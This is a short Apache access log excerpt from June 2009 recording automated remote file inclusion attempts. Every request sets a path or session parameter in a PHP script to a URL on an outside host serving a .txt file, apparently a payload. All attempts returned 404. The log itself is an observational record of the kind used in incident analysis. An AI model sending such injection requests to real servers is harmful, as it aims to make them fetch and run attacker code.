211.230.156.161 - - [28/Jun/2009:04:07:29 -0400] "GET /logs/access_log.Q109051300//include/write.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
116.121.201.73 - - [28/Jun/2009:04:07:42 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
116.121.201.73 - - [28/Jun/2009:04:07:42 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
116.121.201.73 - - [28/Jun/2009:04:07:42 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
116.121.201.73 - - [28/Jun/2009:04:07:42 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
58.227.193.198 - - [28/Jun/2009:04:07:45 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
58.227.193.198 - - [28/Jun/2009:04:07:45 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
58.227.193.198 - - [28/Jun/2009:04:07:45 -0400] "GET /logs/error_log.Q109051200%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
116.121.201.73 - - [28/Jun/2009:04:07:48 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
